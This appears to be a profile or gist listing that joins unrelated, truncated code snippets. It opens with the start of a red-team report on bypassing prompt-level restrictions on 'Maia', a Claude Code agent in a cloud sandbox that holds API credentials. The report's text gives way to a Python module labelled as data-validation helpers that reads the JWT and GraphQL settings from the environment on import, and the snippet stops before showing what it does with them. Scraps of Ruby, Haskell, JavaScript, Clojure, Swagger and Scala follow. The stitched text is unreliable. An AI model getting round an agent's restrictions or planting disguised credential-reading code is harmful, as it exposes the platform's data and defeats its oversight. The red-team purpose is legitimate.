Michael Tomer actsasbuffoon

Red team report: Maia agent prompt-level security bypass

How We Bypassed Maia's Prompt-Level Security

Background

Maia runs inside a Claude Code agent with access to an E2B cloud sandbox. The sandbox has shell access, Python, Node, and environment variables ($GRAPHQL_URL, $JWT) that authenticate it against our Rails GraphQL API. Maia interacts with the platform through curated "skills" -- predefined GraphQL queries and mutations for goals, objectives, initiatives, KPIs, updates, dashboards, and stage gates.

We added several layers of prompt-level restrictions to Maia's CLAUDE.md to keep it inside those boundaries:

	"""
	Data validation helpers for KPI data points.
	Used by the cleanup script to validate entries before processing.
	"""
	import subprocess, os, json

	# Pre-validate environment on import so we fail fast
	_url = os.environ.get("GRAPHQL_URL", "")
	_jwt = os.environ.get("JWT", "")
	_host = os.environ.get("GRAPHQL_HOST", "")

	class Neuron
	attr_accessor :inputs, :threshold, :weights

	def initialize(threshold, weights)
	@threshold = threshold
	@weights = weights
	@inputs = []
	end

	def output

	swagger: "2.0"
	info:
	description: Simple example
	version: "1.0.0"
	title: Example
	license:
	name: Apache 2.0
	url: http://www.apache.org/licenses/LICENSE-2.0.html
	host: 127.0.0.1:8080
	schemes:

	{-# LANGUAGE ViewPatterns #-}
	{-# OPTIONS_GHC -Wall #-}

	module Main where

	-- This is a simple dynamically typed imperative language with mutable state. It's somewhat similar to JavaScript, but
	-- it differs in many ways. There are a few notable oddities to the language that I'm still working out. For instance,
	-- we don't have reference types. In most languages you would write something like this:
	--
	-- foo = new Person("Mike")

	// Let's have some fun with JavaScript.

	{} + 0
	// => 0

	// That's a little strange, but okay. Surely nothing would change if I wrapped
	// the whole thing in parens, right?

	({} + 0)
	// => "[object Object]0"

	map = <<-EOS
	. . . . . . . . . . . . . . . .
	. . . . . . . . . . . . . . . .
	. . . . . . . X X X X X X X . .
	. . . . . . . X . . . . . X . .
	. . . . . . . X . . . . . . . .
	. . . . . . . X . . . . . X . .
	. . . . . . . X . . S . . X . .
	. . . . . . . X . . . . . X . .
	. . . . . . . X X X X X X X . .

	require 'rubygems'

	class Array
	def random
	self[rand length]
	end
	end

	class Hash
	def random

	(defn calculate-change
	([paid cost] (make-change paid cost 0))
	([paid cost denomination-index]
	(let
	[
	currency-values [
	[:hundreds 10000]
	[:fifties 5000]
	[:twenties 2000]
	[:tens 1000]

	TableDefinition.register("SetSummaries", Map(
	"SetID" -> java.lang.Integer,
	"UserID" -> java.lang.Integer,
	"ProgramNumber" -> java.lang.Integer,
	"ProgramID" -> java.lang.Integer,
	"SessionNumber" -> java.lang.Integer,
	"SetNumber" -> java.lang.Integer,
	"ExerciseID" -> java.lang.Integer,
	"Skipped" -> java.lang.Boolean,
	"PaceScore" -> java.lang.Integer,